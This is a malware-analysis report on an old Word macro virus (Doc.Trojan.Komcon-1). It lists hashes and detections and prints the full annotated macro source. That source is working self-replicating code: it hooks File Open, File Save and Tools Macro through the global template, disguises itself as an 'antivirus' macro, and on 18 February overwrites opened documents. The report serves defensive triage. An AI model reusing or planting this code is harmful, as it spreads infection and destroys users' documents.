Doc.Trojan.Komcon-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 4a6fed06a8a6f0a7…

MALICIOUS

Office (OLE)

45.5 KB Created: 1999-09-07 10:31:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 3456114a1f46263e1e61d9191fcb34a6 SHA-1: 5654acae39898beb3e7de012d803f99626ee25e0 SHA-256: 4a6fed06a8a6f0a7cb55a4fba1a4e6d975d16514a1700cdd568f3e668f806132
188 Risk Score

Malware Insights

Doc.Trojan.Komcon-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

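The file contains legacy WordBasic macro markers and a critical ClamAV detection for 'Doc.Trojan.Komcon-1'. The AutoOpen macro copies the document's macros into the global macro storage under built-in command names such as 'ToolsMacro' and 'FileOpen', indicating an attempt to execute malicious code. This behavior is consistent with a macro-based downloader designed to fetch and execute further stages. Note, however, that the extracted macro source previewed below contains no download or network calls; what it shows is self-replication through the global template and the FileOpen/FileSave hooks, plus a date-triggered routine (18 February) that overwrites the opened document with a message.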

Heuristics 4

  • ClamAV: Doc.Trojan.Komcon-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Komcon-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "autoopen"

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5058 bytes
SHA-256: 40703b1843b2f2c68b99f56cc35064204a148d39d2a054e778d36e0371f70afc
Detection
ClamAV: Doc.Trojan.Komcon-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Analyst note: header attributes of the document module as emitted by the
' macro extractor. No procedure code is shown for this module in the preview;
' the behaviour of the sample is in the modules that follow.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "autoopen"

'============================
' (C) Tanto Prihartanto, 1998
'============================
' Analyst note: module named "autoopen", i.e. the auto-run entry point flagged
' by the OLE_VBA_AUTOOPEN heuristic. It copies five macros from the current
' document into "Global:" storage (presumably the global template, Normal.dot -
' confirm) under new names:
'   autoopen -> Global:RAO
'   RTM      -> Global:ToolsMacro
'   RFO      -> Global:FileOpen
'   RFS      -> Global:Filesave
'   RFT      -> Global:FileTemplates
' Four of the targets carry the names of built-in Word commands. In Word a
' macro with a built-in command name normally runs in place of that command,
' so these copies act as hooks on File > Open, File > Save, Tools > Macro and
' File > Templates - confirm for the Word version in use.
' Triage indicators: macros named RAO, ToolsMacro, FileOpen, FileSave and
' FileTemplates in the global template.
Public Sub MAIN()
Dim dokumen$
Dim stmacro$
' dokumen$ ("document") holds the name of the active document.
dokumen$ = WordBasic.[FileName$]()
' Each pair below builds "<document>:<macro>" and copies it into Global:.
stmacro$ = dokumen$ + ":autoopen"
WordBasic.MacroCopy stmacro$, "Global:RAO"
stmacro$ = dokumen$ + ":RTM"
WordBasic.MacroCopy stmacro$, "Global:ToolsMacro"
stmacro$ = dokumen$ + ":RFO"
WordBasic.MacroCopy stmacro$, "Global:FileOpen"
stmacro$ = dokumen$ + ":RFS"
WordBasic.MacroCopy stmacro$, "Global:Filesave"
stmacro$ = dokumen$ + ":RFT"
WordBasic.MacroCopy stmacro$, "Global:FileTemplates"
'stmacro$ = dokumen$ + ":RFT"
'MacroCopy stmacro$, "Global:Filetemplates"
' NOTE(review): FileSaveAll 1, 1 presumably saves all open documents and
' templates without prompting, which would persist the copied macros in the
' global template - confirm against the WordBasic reference.
WordBasic.FileSaveAll 1, 1
End Sub

Attribute VB_Name = "RFO"

' Analyst note: the autoopen module copies this module to Global:FileOpen, so
' it is presumably what runs when the user chooses File > Open on an infected
' installation. Visible behaviour, in order:
'   1. show the Open dialog and open the chosen file;
'   2. if today is day 18 of month 2, jump to "pl" (destructive branch);
'   3. otherwise delete the macros the opened file already contains and jump
'      to "tulari" (Indonesian, roughly "infect"), which copies the Global:
'      macros into the opened file.
' Errors are routed to "done", so failures end the procedure without a prompt.
Public Sub MAIN()
Dim dokumen$
Dim tanggal
Dim bulan
Dim jml
Dim sname$
Dim j
Dim i
Dim stmacro$
' NOTE(review): DisableInput presumably stops the user interrupting the macro
' and DisableAutoMacros 1 presumably suppresses auto macros in the file being
' opened - confirm both against the WordBasic reference.
WordBasic.DisableInput
WordBasic.DisableAutoMacros 1
On Error GoTo -1: On Error GoTo done
' Reproduce the normal File > Open dialog, then open whatever was selected.
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileOpen(False)
WordBasic.CurValues.FileOpen dlg
WordBasic.Dialog.FileOpen dlg
WordBasic.FileOpen dlg
dokumen$ = WordBasic.[FileName$]()
' tanggal = day of month, bulan = month, both taken from the system clock.
tanggal = WordBasic.Day(WordBasic.Now())
bulan = WordBasic.Month(WordBasic.Now())
' Date trigger: 18 February selects the destructive branch at "pl".
If (tanggal = 18) And (bulan = 2) Then GoTo pl
' jml ("count") = number of macros; the argument 1 presumably selects the
' active document/template rather than the global one - confirm.
jml = WordBasic.CountMacros(1)
If jml = 0 Then GoTo tulari
sname$ = WordBasic.[MacroFileName$]("RAE")
' NOTE(review): the test below reads smane$, which is not declared in this
' procedure (sname$ is). The value returned by MacroFileName$ is therefore not
' what is compared, so this early exit is presumably never taken. Also, no
' macro named RAE is copied anywhere in this listing (the lines that would do
' so are commented out).
If smane$ = dokumen$ Then GoTo done
' Collect the names of all macros in the opened file...
ReDim mname__$(jml)
For j = 1 To jml
  mname__$(j) = WordBasic.[MacroName$](j, 1)
Next j
' ...and delete each one from that file (Tab:=3 presumably selects the macros
' tab of the Organizer - confirm). User macros in opened files are lost here.
For i = 1 To jml
   WordBasic.Organizer Delete:=1, Source:=dokumen$, Name:=mname__$(i), Tab:=3
   WordBasic.PrintStatusBar "Deletting macro " + mname__$(i)
Next i
GoTo tulari
' Destructive branch, reached only on 18 February.
pl:
 
Dim pesannya$
' Message text, approximate translation from Indonesian: "It seems you are out
' of luck... your document is now gone. This is not your doing but mine. Happy
' typing again... hopefully you still have the backup."
pesannya$ = "Rupanya Anda sedang sial........, Dokumen Anda kini " + _
"hilang. Ini bukan perbuatan Anda tapi ulah saya." + _
" Selamat Ngetik lagi...semoga Anda masih punya Back-upnya"
' Close the opened file (the argument 2 presumably means "without saving" -
' confirm), create a new document and type the message into it.
WordBasic.FileClose 2
WordBasic.FileNew Template:="Normal"
WordBasic.Font "Arial"
WordBasic.JustifyPara
WordBasic.FontSize 11
WordBasic.Insert "Salam krisis..."
WordBasic.InsertPara
WordBasic.Insert pesannya$
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.RightPara
WordBasic.Bold
WordBasic.FontSize 13
WordBasic.Insert "(C) Semarang, May 1998"
WordBasic.InsertPara
WordBasic.RightPara
WordBasic.Insert "Rosw@ti"
' The new document is saved under the name of the file the user opened, which
' replaces the original content with the message. Recovery depends on backups.
WordBasic.FileSaveAs Name:=dokumen$, Format:=1
' Status bar text, approximately: "Document destruction has been carried out
' successfully".
WordBasic.PrintStatusBar " Penghancuran dokumen telah dilakukan dengan sukses....."
GoTo done
' Infection branch: re-save the opened file and copy the Global: macros into it
' under the names autoopen, RFO, RFS, RFT and RTM.
tulari:
' NOTE(review): Format:=1 is presumably the document-template format, which
' old Word versions required for a file to carry macros - confirm. A .doc that
' is really a template is a useful triage indicator.
WordBasic.FileSaveAs Name:=dokumen$, Format:=1
stmacro$ = dokumen$ + ":autoopen"
WordBasic.MacroCopy "Global:RAO", stmacro$
stmacro$ = dokumen$ + ":RFO"
WordBasic.MacroCopy "Global:FileOpen", stmacro$
stmacro$ = dokumen$ + ":RFS"
WordBasic.MacroCopy "Global:FileSave", stmacro$
'stmacro$ = dokumen$ + ":RAE"
'MacroCopy "Global:AutoExec", stmacro$
stmacro$ = dokumen$ + ":RFT"
WordBasic.MacroCopy "Global:FileTemplates", stmacro$
stmacro$ = dokumen$ + ":RTM"
WordBasic.MacroCopy "Global:ToolsMacro", stmacro$
WordBasic.Filesave
done:
End Sub


Attribute VB_Name = "RFS"

' Analyst note: the autoopen module copies this module to Global:Filesave, so
' it is presumably what runs when the user chooses File > Save on an infected
' installation. It re-saves the active document with Format:=1 and copies the
' Global: macros into it; every path, including the error path, ends with a
' save at "done".
Public Sub MAIN()
Dim dokumen$
Dim pj
Dim loc_
Dim nama$
Dim dlg As Object
Dim jml
Dim sname$
Dim stmacro$
On Error GoTo -1: On Error GoTo done
dokumen$ = WordBasic.[FileName$]()
' pj = length of the name, loc_ = position of the first "." (0 if none).
pj = Len(dokumen$)
loc_ = InStr(dokumen$, ".")
' nama$ is the leftmost (pj - loc_) characters, i.e. as many characters as
' follow the first "."; with no "." it is the whole name.
' NOTE(review): presumably meant to detect a never-saved document (a default
' name with no extension and more than 8 characters) so that the Save As
' dialog is shown first - confirm.
nama$ = WordBasic.[Left$](dokumen$, pj - loc_)
If Len(nama$) > 8 Then
  Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
  WordBasic.CurValues.FileSaveAs dlg
  WordBasic.Dialog.FileSaveAs dlg
  WordBasic.FileSaveAs dlg
  dokumen$ = WordBasic.[FileName$]()
End If
' jml ("count") = number of macros; the argument 1 presumably selects the
' active document/template - confirm.
jml = WordBasic.CountMacros(1)
If jml = 0 Then GoTo tulari
' Skip the copy only if a macro named RAE is reported as living in this
' document. No macro named RAE is copied anywhere in this listing (the lines
' that would do so are commented out below).
sname$ = WordBasic.[MacroFileName$]("RAE")
If sname$ = dokumen$ Then GoTo done Else GoTo tulari
' Infection branch ("tulari", Indonesian, roughly "infect").
tulari:
' NOTE(review): Format:=1 is presumably the document-template format, which
' old Word versions required for a file to carry macros - confirm.
WordBasic.FileSaveAs Name:=dokumen$, Format:=1
stmacro$ = dokumen$ + ":autoopen"
WordBasic.MacroCopy "Global:RAO", stmacro$
stmacro$ = dokumen$ + ":RFO"
WordBasic.MacroCopy "Global:FileOpen", stmacro$
stmacro$ = dokumen$ + ":RFS"
WordBasic.MacroCopy "Global:FileSave", stmacro$
'stmacro$ = dokumen$ + ":RAE"
'MacroCopy "Global:AutoExec", stmacro$
stmacro$ = dokumen$ + ":RFT"
WordBasic.MacroCopy "Global:FileTemplates", stmacro$
stmacro$ = dokumen$ + ":RTM"
WordBasic.MacroCopy "Global:ToolsMacro", stmacro$
done:
WordBasic.Filesave
End Sub

Attribute VB_Name = "RFT"

' Analyst note: the autoopen module copies this module to Global:FileTemplates.
' Its only statement is DisableInput 1, so on an infected installation the
' File > Templates command presumably opens no dialog, which keeps the user
' away from the template and Organizer view where the macros could be seen or
' removed - confirm on the Word version in use.
Public Sub MAIN()
Attribute MAIN.VB_Description = "F%"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.RFT.MAIN"
WordBasic.DisableInput 1
End Sub

Attribute VB_Name = "RTM"

' Analyst note: the autoopen module copies this module to Global:ToolsMacro.
' Its only statement shows a message box, so on an infected installation the
' Tools > Macro command presumably shows this box instead of the macro list,
' hiding the installed macros from the user - confirm on the Word version in
' use. The box text "Antivirus macro v.1.0.0 " / "by Rosw@ti" is a usable
' string indicator for this sample.
Public Sub MAIN()
Attribute MAIN.VB_Description = "F%565"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.RTM.MAIN"
WordBasic.MsgBox "Antivirus macro v.1.0.0 ", "by Rosw@ti"
End Sub